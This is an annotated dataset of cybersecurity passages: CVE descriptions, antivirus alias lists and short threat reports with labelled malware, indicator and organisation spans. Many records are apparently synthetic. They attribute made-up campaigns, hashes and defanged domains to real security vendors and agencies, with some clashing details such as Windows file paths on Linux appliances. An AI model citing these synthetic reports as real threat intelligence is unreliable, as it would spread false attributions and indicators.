{"text": "Malware Analysis Report: Dridex (SHA1: 639784c521af2928bd2e87879e2e558738cbb2bb). Upon execution on Citrix NetScaler, the sample creates C:\\Program Files\\Common Files\\implant.so and injects into legitimate processes. Network analysis shows beaconing to 10 [ . ] 18 [ . ] 240 [ . ] 123 every 60 seconds and DNS queries to auth-data[.]com. The second stage was fetched from hxxps://secureapi[.]link/wp-content/uploads/doc.php and written to /etc/cron.d/sam.hive. The payload uses LinPEAS-style techniques for defense evasion. A secondary hash (MD5: 22828dfd50fe6b019abc606ed78cdd39) was extracted from the unpacked payload.", "spans": {"Malware: Dridex": [[25, 31]], "Indicator: 639784c521af2928bd2e87879e2e558738cbb2bb": [[39, 79]], "System: Citrix NetScaler": [[100, 116]], "Indicator: 10.18.240.123": [[253, 284]], "Indicator: auth-data.com": [[321, 336]], "Indicator: hxxps://secureapi.link/wp-content/uploads/doc.php": [[372, 423]], "Indicator: 22828dfd50fe6b019abc606ed78cdd39": [[547, 579]]}, "info": {"id": "synth_v2_00531", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nrtl818x: Prevent using not initialized queues\n\nUsing not existing queues can panic the kernel with rtl8180/rtl8185 cards.\nIgnore the skb priority for those cards, they only have one tx queue. Pierre\nAsselin (pa@panix[.]com) reported the kernel crash in the Gentoo forum:\n\nhxxps://forums[.]gentoo[.]org/viewtopic-t-1147832-postdays-0-postorder-asc-start-25.html\n\nHe also confirmed that this patch fixes the issue. In summary this happened:\n\nAfter updating wpa_supplicant from 2.9 to 2.10 the kernel crashed with a\n\"divide error: 0000\" when connecting to an AP. Control port tx now tries to\nuse IEEE80211_AC_VO for the priority, which wpa_supplicants starts to use in\n2.10.\n\nSince only the rtl8187se part of the driver supports QoS, the priority\nof the skb is set to IEEE80211_AC_BE (2) by mac80211 for rtl8180/rtl8185\ncards.\n\nrtl8180 is then unconditionally reading out the priority and finally crashes on\ndrivers/net/wireless/realtek/rtl818x/rtl8180/dev.c line 544 without this\npatch:\n\tidx = (ring->idx + skb_queue_len(&ring->queue)) % ring->entries\n\n\"ring->entries\" is zero for rtl8180/rtl8185 cards, tx_ring[2] never got\ninitialized.", "spans": {"Indicator: https://forums.gentoo.org/viewtopic-t-1147832-postdays-0-postorder-asc-start-25.html": [[341, 429]], "Indicator: panix.com": [[280, 291]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-49326"}}
{"text": "Malware Analysis Report: PlugX (SHA1: 04e53ab7e9c48038c583633c9265f0b8e8ee092a). Upon execution on F5 BIG-IP, the sample creates C:\\Windows\\Temp\\taskhost.exe and injects into legitimate processes. Network analysis shows beaconing to 192 [ . ] 227 [ . ] 160 [ . ] 28 every 60 seconds and DNS queries to relaysync[ . ]xyz. The second stage was fetched from hxxp://backupsecure[ . ]cc/secure/token and written to C:\\Users\\admin\\AppData\\Local\\Temp\\winlogon.exe. The payload uses Certutil-style techniques for defense evasion. A secondary hash (MD5: e8e6c237398482121103362166ec3c54) was extracted from the unpacked payload.", "spans": {"Malware: PlugX": [[25, 30]], "Indicator: 04e53ab7e9c48038c583633c9265f0b8e8ee092a": [[38, 78]], "System: F5 BIG-IP": [[99, 108]], "Indicator: 192.227.160.28": [[233, 265]], "Indicator: relaysync.xyz": [[302, 319]], "Indicator: hxxp://backupsecure.cc/secure/token": [[355, 394]], "Indicator: e8e6c237398482121103362166ec3c54": [[545, 577]]}, "info": {"id": "synth_v2_00559", "source": "defanged_augment"}}
{"text": "Blog Post by Proofpoint: Tracking Kimsuky's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2023-26043 against Active Directory deployments. The initial access vector involves spear-phishing emails from updates@account-update[ . ]xyz delivering FormBook. Post-compromise, the attackers deploy BatLoader and use Nmap for reconnaissance. C2 infrastructure includes 152 [ . ] 214 [ . ] 144 [ . ] 94 and sync-backup[.]net. A staging server at hxxps://secure-node[.]dev/api/v2/auth hosts additional tooling. Key artifact: /usr/local/bin/backdoor.elf (SHA256: 4297e10d3eb510192ad6cbd31213d4dcde9d0d0578ae29c7441598ee6c470991).", "spans": {"Organization: Proofpoint": [[13, 23]], "Vulnerability: CVE-2023-26043": [[121, 135]], "System: Active Directory": [[144, 160]], "Indicator: updates@account-update.xyz": [[236, 266]], "Malware: FormBook": [[278, 286]], "Malware: BatLoader": [[326, 335]], "Indicator: 152.214.144.94": [[396, 428]], "Indicator: sync-backup.net": [[433, 450]], "Indicator: hxxps://secure-node.dev/api/v2/auth": [[472, 509]], "Indicator: 4297e10d3eb510192ad6cbd31213d4dcde9d0d0578ae29c7441598ee6c470991": [[587, 651]]}, "info": {"id": "synth_v2_01613", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Microsoft MSRC identified a large-scale phishing operation. Emails originated from confirm@phishing-domain[.]com and it@document-share[ . ]link, spoofing legitimate services. Victims were directed to hxxps://auth-login[ . ]live/portal/verify which hosted a credential harvesting page on storagestatic[ . ]cc. A secondary link hxxp://secure-cache[ . ]com/secure/token delivered Meduza Stealer (SHA256: 66a282c45e27ce9328111ae8c1fcee81ca2c7cd7ca5b3c54dea94ade436a63d3). The malware was saved to C:\\Users\\Public\\Documents\\payload.bin and established C2 with 172[.]205[.]101[.]20.", "spans": {"Organization: Microsoft MSRC": [[26, 40]], "Indicator: confirm@phishing-domain.com": [[109, 138]], "Indicator: it@document-share.link": [[143, 169]], "Indicator: https://auth-login.live/portal/verify": [[226, 267]], "Indicator: storagestatic.cc": [[313, 333]], "Indicator: http://secure-cache.com/secure/token": [[352, 392]], "Malware: Meduza Stealer": [[403, 417]], "Indicator: 66a282c45e27ce9328111ae8c1fcee81ca2c7cd7ca5b3c54dea94ade436a63d3": [[427, 491]], "Indicator: 172.205.101.20": [[581, 601]]}, "info": {"id": "synth_v2_00948", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Brute Ratel artifacts at C:\\Users\\admin\\AppData\\Local\\Temp\\loader.exe. Memory dump analysis confirmed execution of GhostPack. Registry modifications pointed to persistence via /dev/shm/beacon.dll. Network forensics identified connections to 176[.]146[.]122[.]241 and cloudrelay[ . ]club. Email headers traced the initial vector to hr@phishing-domain[ . ]com. File /usr/local/bin/beacon.dll (MD5: b653caa707f8cd58a24fab7fa59a0735) was identified as the initial dropper. A staging URL hxxp://proxy-portal[.]online/panel/index.html resolved to 215 [ . ] 171 [ . ] 70 [ . ] 151. Secondary artifact hash: SHA1: b08a1ea2f3b2d40d6d2126041f168b7606ab3762.", "spans": {"Indicator: 176.146.122.241": [[313, 334]], "Indicator: cloudrelay.club": [[339, 358]], "Indicator: hr@phishing-domain.com": [[403, 429]], "Indicator: b653caa707f8cd58a24fab7fa59a0735": [[468, 500]], "Indicator: http://proxy-portal.online/panel/index.html": [[555, 600]], "Indicator: 215.171.70.151": [[613, 645]], "Indicator: b08a1ea2f3b2d40d6d2126041f168b7606ab3762": [[678, 718]]}, "info": {"id": "synth_v2_01147", "source": "defanged_augment"}}
{"text": "TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.RaggedTensorToVariant`. The [implementation](hxxps://github[.]com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/ragged_tensor_to_variant_op.cc#L129) has an incomplete validation of the splits values, missing the case when the argument would be empty. We have patched the issue in GitHub commit be7a4de6adfbd303ce08be4332554dff70362612. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/ragged_tensor_to_variant_op.cc#L129": [[233, 381]], "Indicator: be7a4de6adfbd303ce08be4332554dff70362612": [[528, 568]], "Organization: GitHub": [[514, 520]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-37666"}}
{"text": "ALERT: Gh0st RAT detected on Confluence Server endpoint. Process C:\\Windows\\Temp\\debug.exe (MD5: 44a95bcfbefb0a37275dacea5d2dc1ee) initiated outbound connection to 23 [ . ] 121 [ . ] 5 [ . ] 192 resolving monitor-net[[.]]org. Immediate containment recommended.", "spans": {"Malware: Gh0st RAT": [[7, 16]], "System: Confluence Server": [[29, 46]], "Indicator: 44a95bcfbefb0a37275dacea5d2dc1ee": [[97, 129]], "Indicator: 23.121.5.192": [[164, 194]], "Indicator: monitor-net[.]org": [[205, 224]]}, "info": {"id": "synth_00083", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2024-36290 is a critical cross-site scripting affecting Active Directory. Tenable confirmed active exploitation by Flax Typhoon in the wild. Exploitation delivers REvil (SHA256: ebe5f5622b56e020c0405d60fcc24493f23f3d2ccdc4eadb3df0d5cfc45d1123) which is dropped to /dev/shm/helper.sh. The exploit payload is hosted at hxxps://nodesync[.]top/login and communicates to 172 [ . ] 204 [ . ] 76 [ . ] 62 for C2.", "spans": {"Vulnerability: CVE-2024-36290": [[24, 38]], "Vulnerability: cross-site scripting": [[53, 73]], "System: Active Directory": [[84, 100]], "Organization: Tenable": [[102, 109]], "Malware: REvil": [[191, 196]], "Indicator: ebe5f5622b56e020c0405d60fcc24493f23f3d2ccdc4eadb3df0d5cfc45d1123": [[206, 270]], "Indicator: hxxps://nodesync.top/login": [[345, 373]], "Indicator: 172.204.76.62": [[394, 425]]}, "info": {"id": "synth_v2_00674", "source": "defanged_augment"}}
{"text": "Huntress published a threat intelligence report linking APT28 to a new campaign exploiting CVE-2020-12082 in Ubuntu 22.04. The attackers deployed Meduza Stealer via Impacket, establishing C2 communication with 129 [ . ] 54 [ . ] 148 [ . ] 202 and portalportal[.]live. A secondary payload was downloaded from hxxp://proxy-secure[ . ]io/download/update.exe. The malware binary (SHA1: 97a05e736aacd79574fe3a5d5d0b599d7bcf638e) was dropped to C:\\Users\\admin\\Desktop\\dropper.ps1. Phishing emails were sent from finance@account-update[ . ]xyz targeting enterprise users. A backup C2 server was identified at 156 [ . ] 44 [ . ] 144 [ . ] 196.", "spans": {"Organization: Huntress": [[0, 8]], "Vulnerability: CVE-2020-12082": [[91, 105]], "System: Ubuntu 22.04": [[109, 121]], "Malware: Meduza Stealer": [[146, 160]], "Indicator: 129.54.148.202": [[210, 242]], "Indicator: portalportal.live": [[247, 266]], "Indicator: hxxp://proxy-secure.io/download/update.exe": [[308, 354]], "Indicator: 97a05e736aacd79574fe3a5d5d0b599d7bcf638e": [[382, 422]], "Indicator: finance@account-update.xyz": [[506, 536]], "Indicator: 156.44.144.196": [[602, 634]]}, "info": {"id": "synth_v2_00150", "source": "defanged_augment"}}
{"text": "Blog Post by Symantec: Tracking Aqua Blizzard's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2023-20659 against VMware ESXi deployments. The initial access vector involves spear-phishing emails from account@login-portal[ . ]tech delivering Latrodectus. Post-compromise, the attackers deploy Qbot and use Ligolo for reconnaissance. C2 infrastructure includes 172 [ . ] 50 [ . ] 111 [ . ] 172 and mailproxy[.]info. A staging server at hxxps://edgeportal[ . ]net/assets/js/payload.js hosts additional tooling. Key artifact: /var/tmp/agent.py (MD5: d18dd20df96d1fdff92806c64bddbf48).", "spans": {"Organization: Symantec": [[13, 21]], "Vulnerability: CVE-2023-20659": [[125, 139]], "System: VMware ESXi": [[148, 159]], "Indicator: account@login-portal.tech": [[235, 264]], "Malware: Latrodectus": [[276, 287]], "Malware: Qbot": [[327, 331]], "Indicator: 172.50.111.172": [[394, 426]], "Indicator: mailproxy.info": [[431, 447]], "Indicator: hxxps://edgeportal.net/assets/js/payload.js": [[469, 516]], "Indicator: d18dd20df96d1fdff92806c64bddbf48": [[581, 613]]}, "info": {"id": "synth_v2_01511", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Gootloader (SHA256: 6302f4cb2eb5592f761ace9da3188c559b551f3334a41ece7c7a2655fa623944). Upon execution on Citrix NetScaler, the sample creates /opt/app/bin/runtime.dll and injects into legitimate processes. Network analysis shows beaconing to 171 [ . ] 83 [ . ] 242 [ . ] 208 every 60 seconds and DNS queries to mailnode[ . ]info. The second stage was fetched from hxxp://portalgateway[.]link/portal/verify and written to /var/tmp/sam.hive. The payload uses CrackMapExec-style techniques for defense evasion. A secondary hash (MD5: 4b268f56470128b36d3042d5d65d900d) was extracted from the unpacked payload.", "spans": {"Malware: Gootloader": [[25, 35]], "Indicator: 6302f4cb2eb5592f761ace9da3188c559b551f3334a41ece7c7a2655fa623944": [[45, 109]], "System: Citrix NetScaler": [[130, 146]], "Indicator: 171.83.242.208": [[267, 299]], "Indicator: mailnode.info": [[336, 353]], "Indicator: hxxp://portalgateway.link/portal/verify": [[389, 430]], "Indicator: 4b268f56470128b36d3042d5d65d900d": [[556, 588]]}, "info": {"id": "synth_v2_00613", "source": "defanged_augment"}}
{"text": "CVE-2025-4654: The Soumettre[ . ]fr plugin for WordPress is vulnerable to unauthorized access and modification of data due to a improper authorization checks on the make_signature function in all versions up to, and including, 2.1.5. This makes it possible for unauthenticated attackers to create/edit/delete Soumettre posts. This vulnerability affects only installations where the soumettre account is not connected (i.e. API key is not installed)", "spans": {"Vulnerability: CVE-2025-4654": [[0, 13]], "System: WordPress": [[47, 56]], "Vulnerability: unauthorized access": [[74, 93]], "Vulnerability: improper authorization": [[128, 150]], "Indicator: Soumettre.fr": [[19, 35]]}, "info": {"id": "nvd_2025_4654", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojandownloader.Tosct Win32.Trojan.WisdomEyes.16070401.9500.9994 BKDR_WEBRV.A Trojan.Click2.39104 BKDR_WEBRV.A W32/Trojan.KRMY-0312 Trojan[.]Heur[.]JP.ED64BF TrojanDownloader:Win32/Tosct.B", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Trojan.Heur.JP": [[159, 177]]}, "info": {"id": "cyner2_train_000768", "source": "defanged_augment"}}
{"text": "TensorFlow is an end-to-end open source platform for machine learning. An attacker can cause a runtime division by zero error and denial of service in `tf.raw_ops.FractionalAvgPool`. This is because the implementation(hxxps://github[ . ]com/tensorflow/tensorflow/blob/acc8ee69f5f46f92a3f1f11230f49c6ac266f10c/tensorflow/core/kernels/fractional_avg_pool_op.cc#L85-L89) computes a divisor quantity by dividing two user controlled values. The user controls the values of `input_size[i]` and `pooling_ratio_[i]` (via the `value.shape()` and `pooling_ratio` arguments). If the value in `input_size[i]` is smaller than the `pooling_ratio_[i]`, then the floor operation results in `output_size[i]` being 0. The `DCHECK_GT` line is a no-op outside of debug mode, so in released versions of TF this does not trigger. Later, these computed values are used as arguments(hxxps://github[.]com/tensorflow/tensorflow/blob/acc8ee69f5f46f92a3f1f11230f49c6ac266f10c/tensorflow/core/kernels/fractional_avg_pool_op.cc#L96-L99) to `GeneratePoolingSequence`(hxxps://github[ . ]com/tensorflow/tensorflow/blob/acc8ee69f5f46f92a3f1f11230f49c6ac266f10c/tensorflow/core/kernels/fractional_pool_common.cc#L100-L108). There, the first computation is a division in a modulo operation. Since `output_length` can be 0, this results in runtime crashing. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/acc8ee69f5f46f92a3f1f11230f49c6ac266f10c/tensorflow/core/kernels/fractional_avg_pool_op.cc#L85-L89": [[218, 366]], "Indicator: https://github.com/tensorflow/tensorflow/blob/acc8ee69f5f46f92a3f1f11230f49c6ac266f10c/tensorflow/core/kernels/fractional_avg_pool_op.cc#L96-L99": [[859, 1005]], "Indicator: https://github.com/tensorflow/tensorflow/blob/acc8ee69f5f46f92a3f1f11230f49c6ac266f10c/tensorflow/core/kernels/fractional_pool_common.cc#L100-L108": [[1036, 1186]], "Vulnerability: denial of service": [[130, 147]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-29550"}}
{"text": "A backdoor also known as: Trojan.Win32.Malware.1 Trojan.Rootkit.GGA Backdoor:W32/PcClient.ALE BACKDOOR.Trojan Backdoor:Win32/Xinia.C Trojan.Rootkit.GGA RootKit[.]Win32[.]Undef[.]ru W32/Rootkit.A SHeur.CPFS", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: RootKit.Win32.Undef.ru": [[152, 180]]}, "info": {"id": "cyner2_train_003451", "source": "defanged_augment"}}
{"text": "jsoup is a Java HTML parser, built for HTML editing, cleaning, scraping, and cross-site scripting (XSS) safety. jsoup may incorrectly sanitize HTML including `javascript:` URL expressions, which could allow XSS attacks when a reader subsequently clicks that link. If the non-default `SafeList.preserveRelativeLinks` option is enabled, HTML including `javascript:` URLs that have been crafted with control characters will not be sanitized. If the site that this HTML is published on does not set a Content Security Policy, an XSS attack is then possible. This issue is patched in jsoup 1.15.3. Users should upgrade to this version. Additionally, as the unsanitized input may have been persisted, old content should be cleaned again using the updated version. To remediate this issue without immediately upgrading: - disable `SafeList.preserveRelativeLinks`, which will rewrite input URLs as absolute URLs - ensure an appropriate [Content Security Policy](hxxps://developer[.]mozilla[.]org/en-US/docs/Web/HTTP/CSP) is defined. (This should be used regardless of upgrading, as a defence-in-depth best practice.)", "spans": {"Indicator: https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP": [[954, 1011]], "System: Java": [[11, 15]], "Vulnerability: cross-site scripting": [[77, 97]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-36033"}}
{"text": "Vulnerability Advisory: CVE-2022-28965 is a critical privilege escalation affecting Ubuntu 22.04. Zscaler ThreatLabz confirmed active exploitation by OilRig in the wild. Exploitation delivers PikaBot (SHA256: 56e500ca7d83c6220c2f8eb11cad312e1abf3982c8c1512e11e39c76ae2cd56f) which is dropped to /tmp/taskhost.exe. The exploit payload is hosted at hxxps://proxy-backup[ . ]site/download/update.exe and communicates to 192 [ . ] 82 [ . ] 45 [ . ] 107 for C2.", "spans": {"Vulnerability: CVE-2022-28965": [[24, 38]], "Vulnerability: privilege escalation": [[53, 73]], "System: Ubuntu 22.04": [[84, 96]], "Organization: Zscaler ThreatLabz": [[98, 116]], "Malware: PikaBot": [[192, 199]], "Indicator: 56e500ca7d83c6220c2f8eb11cad312e1abf3982c8c1512e11e39c76ae2cd56f": [[209, 273]], "Indicator: hxxps://proxy-backup.site/download/update.exe": [[347, 396]], "Indicator: 192.82.45.107": [[417, 448]]}, "info": {"id": "synth_v2_00812", "source": "defanged_augment"}}
{"text": "NSA published a threat intelligence report linking OilRig to a new campaign exploiting CVE-2021-39439 in Citrix NetScaler. The attackers deployed SystemBC via Havoc, establishing C2 communication with 16 [ . ] 141 [ . ] 64 [ . ] 180 and portal-proxy[.]org. A secondary payload was downloaded from hxxps://gatewayportal[ . ]online/admin/config. The malware binary (SHA256: 2efd63356677694ca494c881d44536f0be396e2b75068ad9f144e5101318755e) was dropped to C:\\Users\\admin\\Desktop\\loader.exe. Phishing emails were sent from hr@auth-check[.]org targeting enterprise users. A backup C2 server was identified at 10 [ . ] 74 [ . ] 164 [ . ] 213.", "spans": {"Organization: NSA": [[0, 3]], "Vulnerability: CVE-2021-39439": [[87, 101]], "System: Citrix NetScaler": [[105, 121]], "Malware: SystemBC": [[146, 154]], "Indicator: 16.141.64.180": [[201, 232]], "Indicator: portal-proxy.org": [[237, 255]], "Indicator: hxxps://gatewayportal.online/admin/config": [[297, 342]], "Indicator: 2efd63356677694ca494c881d44536f0be396e2b75068ad9f144e5101318755e": [[372, 436]], "Indicator: hr@auth-check.org": [[519, 538]], "Indicator: 10.74.164.213": [[604, 635]]}, "info": {"id": "synth_v2_00098", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan.Win32.Kolweb!O Trojan.Lokrodem.25745 Trojan.Kolweb.Win32.139 Troj.W32.Kolweb.mBu8 Trojan/Kolweb.a Win32.Trojan.WisdomEyes.16070401.9500.9687 Adware.Margoc Win32/Startpage[.]SK Win.Trojan.Kolweb-96 Trojan.Win32.Kolweb.a Trojan.Win32.Kolweb.cxqwlv Trojan.Win32.A.Kolweb.224389[ASPack] Trojan.PWS.Mirka BehavesLike.Win32.Sality.fc Trojan/Kolweb.cm TR/Delf[ . ]CF.13 Trojan/Win32.Kolweb Trojan:Win32/Lokrodem.A.dll Trojan.Win32.Kolweb.a Trojan/Win32.Kolweb.C12167 Trojan.Kolweb Trojan.Graftor.D33DE Win32.Trojan.Kolweb.Edns Trojan.PWS.Delf!+6OEG1VoGF8 Win32/Trojan.f0c", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Startpage.SK": [[194, 208]], "Indicator: Delf.CF": [[381, 392]]}, "info": {"id": "cyner2_train_005173", "source": "defanged_augment"}}
{"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . Analysts in our DeepSight Managed Adversary and Threat Intelligence ( MATI ) team have found a new backdoor , Backdoor[ . ]Powemuddy , new variants of Seedworm 's Powermud backdoor ( aka POWERSTATS ) , a GitHub repository used by the group to store their scripts , as well as several post-compromise tools the group uses to exploit victims once they have established a foothold in their network .", "spans": {"Malware: Mimikatz": [[0, 8]], "Organization: DeepSight Managed Adversary and Threat Intelligence": [[121, 172]], "Organization: MATI": [[175, 179]], "Indicator: Backdoor.Powemuddy": [[215, 237]], "Indicator: Powermud backdoor": [[268, 285]], "Malware: POWERSTATS": [[292, 302]], "Vulnerability: exploit": [[429, 436]]}, "info": {"id": "cyberner_stix_train_006912", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.LRQwegierExe.Trojan Trojan/W32[.]Small[.]14848[.]CH Trojan.Daws.17020 Trojan.Kazy.D192B Win32.Trojan.Dalixi.f Trojan-Dropper.Win32.Daws.dyru Troj.W32.KillAV.lCzy BehavesLike.Win32.VTFlooder.lh Trojan:Win32/Ghodow.A Trojan-Dropper.Win32.Daws.dyru Win32/Dalixi.A Trojan.Dalixi!sYT5S6B5t8c W32/Dloader.IQS!tr.dldr Win32/Trojan.b7f", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: W32.Small.14848.CH": [[57, 81]]}, "info": {"id": "cyner2_train_005667", "source": "defanged_augment"}}
{"text": "FireEye published a threat intelligence report linking Velvet Tempest to a new campaign exploiting CVE-2020-48698 in Barracuda ESG. The attackers deployed Lumma Stealer via SharpHound, establishing C2 communication with 140[.]241[.]76[.]94 and portal-mail[ . ]io. A secondary payload was downloaded from hxxp://data-static[ . ]top/panel/index.html. The malware binary (SHA256: 3e53f8b989435e5f98f75ecaee4922b736b44e850fdf9719ff280fc6fb2cf3b6) was dropped to C:\\Windows\\Tasks\\config.dat. Phishing emails were sent from security@document-share[ . ]link targeting enterprise users. A backup C2 server was identified at 58[.]148[.]68[.]119.", "spans": {"Organization: FireEye": [[0, 7]], "Vulnerability: CVE-2020-48698": [[99, 113]], "System: Barracuda ESG": [[117, 130]], "Malware: Lumma Stealer": [[155, 168]], "Indicator: 140.241.76.94": [[220, 239]], "Indicator: portal-mail.io": [[244, 262]], "Indicator: hxxp://data-static.top/panel/index.html": [[304, 347]], "Indicator: 3e53f8b989435e5f98f75ecaee4922b736b44e850fdf9719ff280fc6fb2cf3b6": [[377, 441]], "Indicator: security@document-share.link": [[518, 550]], "Indicator: 58.148.68.119": [[616, 635]]}, "info": {"id": "synth_v2_00154", "source": "defanged_augment"}}
{"text": "In Wagtail before versions 2.7.3 and 2.8.2, a potential timing attack exists on pages or documents that have been protected with a shared password through Wagtail's \"Privacy\" controls. This password check is performed through a character-by-character string comparison, and so an attacker who is able to measure the time taken by this check to a high degree of accuracy could potentially use timing differences to gain knowledge of the password. This is [understood to be feasible on a local network, but not on the public internet](hxxps://groups[ . ]google[ . ]com/d/msg/django-developers/iAaq0pvHXuA/fpUuwjK3i2wJ).\n\nPrivacy settings that restrict access to pages/documents on a per-user or per-group basis (as opposed to a shared password) are unaffected by this vulnerability.\n\nThis has been patched in 2.7.3, 2.8.2, 2.9.", "spans": {"Indicator: https://groups.google.com/d/msg/django-developers/iAaq0pvHXuA/fpUuwjK3i2wJ": [[533, 615]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-11037"}}
{"text": "ALERT: Mimikatz detected on Nginx endpoint. Process C:\\Users\\Public\\Libraries\\shell.ps1 (MD5: 78a8258631abcaf49dde4311227bd06b) initiated outbound connection to 204[.]243[.]141[.]43 resolving cert-verify[[.]]dev. Immediate containment recommended.", "spans": {"Malware: Mimikatz": [[7, 15]], "System: Nginx": [[28, 33]], "Indicator: 78a8258631abcaf49dde4311227bd06b": [[94, 126]], "Indicator: 204.243.141.43": [[161, 181]], "Indicator: cert-verify[.]dev": [[192, 211]]}, "info": {"id": "synth_00023", "source": "defanged_augment"}}
{"text": "Blog Post by Rapid7: Tracking Volt Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-46781 against Cisco ASA deployments. The initial access vector involves spear-phishing emails from admin@secure-verify[ . ]net delivering QakBot. Post-compromise, the attackers deploy DanaBot and use SharpHound for reconnaissance. C2 infrastructure includes 34[.]197[.]204[.]215 and data-auth[.]site. A staging server at hxxp://backup-cdn[.]dev/wp-content/uploads/doc.php hosts additional tooling. Key artifact: /dev/shm/chrome_helper.exe (SHA256: 8a7790351e3a349454b62034b153635b13f6bcd13923e54cbd5432af1eaa804f).", "spans": {"Organization: Rapid7": [[13, 19]], "Vulnerability: CVE-2020-46781": [[122, 136]], "System: Cisco ASA": [[145, 154]], "Indicator: admin@secure-verify.net": [[230, 257]], "Malware: QakBot": [[269, 275]], "Malware: DanaBot": [[315, 322]], "Indicator: 34.197.204.215": [[389, 409]], "Indicator: data-auth.site": [[414, 430]], "Indicator: hxxp://backup-cdn.dev/wp-content/uploads/doc.php": [[452, 502]], "Indicator: 8a7790351e3a349454b62034b153635b13f6bcd13923e54cbd5432af1eaa804f": [[579, 643]]}, "info": {"id": "synth_v2_01578", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Recorded Future identified a large-scale phishing operation. Emails originated from confirm@account-update[ . ]xyz and finance@document-share[.]link, spoofing legitimate services. Victims were directed to hxxps://cachedata[.]cc/callback which hosted a credential harvesting page on nodecloud[.]club. A secondary link hxxps://mail-data[.]top/api/v2/auth delivered ShadowPad (SHA256: 85cc003f56ae70bca4bd18b039f25c7b4e2f3a739a651567d33e972e033958be). The malware was saved to /var/tmp/svchost.exe and established C2 with 207 [ . ] 106 [ . ] 242 [ . ] 34.", "spans": {"Organization: Recorded Future": [[26, 41]], "Indicator: confirm@account-update.xyz": [[110, 140]], "Indicator: finance@document-share.link": [[145, 174]], "Indicator: hxxps://cachedata.cc/callback": [[231, 262]], "Indicator: nodecloud.club": [[308, 324]], "Indicator: hxxps://mail-data.top/api/v2/auth": [[343, 378]], "Malware: ShadowPad": [[389, 398]], "Indicator: 85cc003f56ae70bca4bd18b039f25c7b4e2f3a739a651567d33e972e033958be": [[408, 472]], "Indicator: 207.106.242.34": [[545, 577]]}, "info": {"id": "synth_v2_01046", "source": "defanged_augment"}}
{"text": "In this scenario , the domain cdnverify[.]net was registered on January 30 , 2018 and just two days later , an attack was launched using this domain as a C2 .", "spans": {"Indicator: cdnverify.net": [[30, 45]]}, "info": {"id": "cyberner_stix_train_007114", "source": "defanged_augment"}}
{"text": "In addition , at this stage the app can process one of these commands : • Collect device info • Install app • Is online ? APT33 registered multiple domains that masquerade as Saudi Arabian aviation companies and Western organizations that together have partnerships to provide training , maintenance and support for Saudi 's military and commercial fleet . Inside the binaries the compiler left references to the names of the C source file modules used: operation_reg[.]c , thread_command[.]c and thread_upload[.]c . What makes COSMICENERGY unique is that based on our analysis , a contractor may have developed it as a red teaming tool for simulated power disruption exercises hosted by Rostelecom - Solar , a Russian cyber security company .", "spans": {"Organization: aviation companies": [[189, 207]], "Indicator: operation_reg.c": [[454, 471]], "Indicator: thread_command.c": [[474, 492]], "Indicator: thread_upload.c": [[497, 514]], "Malware: COSMICENERGY": [[528, 540]], "Organization: Rostelecom - Solar": [[688, 706]], "Organization: Russian cyber security company": [[711, 741]]}, "info": {"id": "cyberner_stix_train_001054", "source": "defanged_augment"}}
{"text": "Automated botnet fingerprinting identified two high-threat command-and-control nodes. IP 79 [ . ] 127 [ . ] 138 [ . ] 77 (fingerprint 9f96b00ce11bc787) and IP 3[.]236[.]224[.]33 (fingerprint fce59ecbc730e00a) both received threat scores of 95/100. The C2 panels were accessible at hxxp://79[.]127[.]138[.]77:8080/panel and hxxp://3[ . ]236[ . ]224[ . ]33:9090/admin. Both nodes serve as relay infrastructure for distributing DDoS payloads.", "spans": {"Indicator: 79.127.138.77": [[89, 120]], "Indicator: 3.236.224.33": [[159, 177]], "Indicator: http://79.127.138.77:8080/panel": [[281, 318]], "Indicator: http://3.236.224.33:9090/admin": [[323, 365]]}, "info": {"id": "otx_00037", "source": "defanged_augment"}}
{"text": "Suspected TEMP.Veles incidents include malicious activity originating from 87 [ . ] 245 [ . ] 143 [ . ] 140 , which is registered to CNIIHM .", "spans": {"Indicator: 87.245.143.140": [[75, 107]], "Organization: CNIIHM": [[133, 139]]}, "info": {"id": "cyberner_stix_train_003985", "source": "defanged_augment"}}
